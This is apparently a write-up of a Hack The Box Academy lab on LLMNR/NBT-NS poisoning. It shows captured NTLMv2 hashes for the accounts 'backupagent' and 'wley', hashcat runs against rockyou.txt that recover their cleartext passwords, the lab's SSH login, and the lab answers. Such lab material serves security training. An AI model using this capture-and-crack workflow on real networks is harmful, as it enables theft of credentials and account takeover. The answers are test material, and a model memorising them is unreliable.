LLMNR/NBT-NS Poisoning - from Linux
❓Question
Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.
Abstract
Let's start by logging into the target machine via SSH using the provided credentials (htb-student:HTB_@cademy_stdnt!).
Then, we listen with responder:
We wait for a user whose name starts with "b" to make a request. Upon receiving a request from backupagent:
[SMB] NTLMv2-SSP Hash : backupagent::INLANEFREIGHT:9e4e94d637e98034:7B45F15D0FBBB2F93F26C9AB159C8C42:010100000000000080D15BC784A1DB01F55CEE317007B22300000000020008005400480037004F0001001E00570049004E002D005A00470052004400390047004100360056005A00430004003400570049004E002D005A00470052004400390047004100360056005A0043002E005400480037004F002E004C004F00430041004C00030014005400480037004F002E004C004F00430041004C00050014005400480037004F002E004C004F00430041004C000700080080D15BC784A1DB0106000400020000000800300030000000000000000000000000300000275EF31D24CD79C624E8089BC8B85262F06CE56E83254950939F65AE61CA08840A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000
Answer
backupagent
❓Question
Crack the hash for the previous account and submit the cleartext password as your answer.
📋 Walkthrough
Now we can crack the hash using hashcat:
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 6 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
BACKUPAGENT::INLANEFREIGHT:9e4e94d637e98034:7b45f15d0fbbb2f93f26c9ab159c8c42:<SNIP>:h1backup55
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: BACKUPAGENT::INLANEFREIGHT:9e4e94d637e98034:7b45f15...000000
Time.Started.....: Sun Mar 30 21:09:30 2025 (1 sec)
Time.Estimated...: Sun Mar 30 21:09:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5857.3 kH/s (1.98ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7741440/14344385 (53.97%)
Rejected.........: 0/7741440 (0.00%)
Restore.Point....: 7716864/14344385 (53.80%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: hailey5085 -> gw37075
Hardware.Mon.#1..: Temp: 45c Util: 50%
Started: Sun Mar 30 21:09:29 2025
Stopped: Sun Mar 30 21:09:33 2025
The account credentials are backupagent:h1backup55.
Answer
h1backup55
❓Question
Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.
📋 Walkthrough
We proceed as before. In my case, I have already retrieved the hash for wley, so I will search for it in the responder logs.
┌─[htb-student@ea-attack01]─[~]
└──╼ $grep "wley" /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.5.130.txt
wley::INLANEFREIGHT:def8507f67a3f2f2:84A3BBE763A9B3EDB0D8E5B6B1FAD8D6:010100000000000080D15BC784A1DB019BA9DC43D49263F300000000020008005400480037004F0001001E00570049004E002D005A00470052004400390047004100360056005A00430004003400570049004E002D005A00470052004400390047004100360056005A0043002E005400480037004F002E004C004F00430041004C00030014005400480037004F002E004C004F00430041004C00050014005400480037004F002E004C004F00430041004C000700080080D15BC784A1DB0106000400020000000800300030000000000000000000000000300000275EF31D24CD79C624E8089BC8B85262F06CE56E83254950939F65AE61CA08840A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000
Now we crack the password using hashcat:
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 6 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
WLEY::INLANEFREIGHT:def8507f67a3f2f2:84a3bbe763a9b3edb0d8e5b6b1fad8d6:<SNIP>:transporter@4
...
<SNIP>
Answer
transporter@4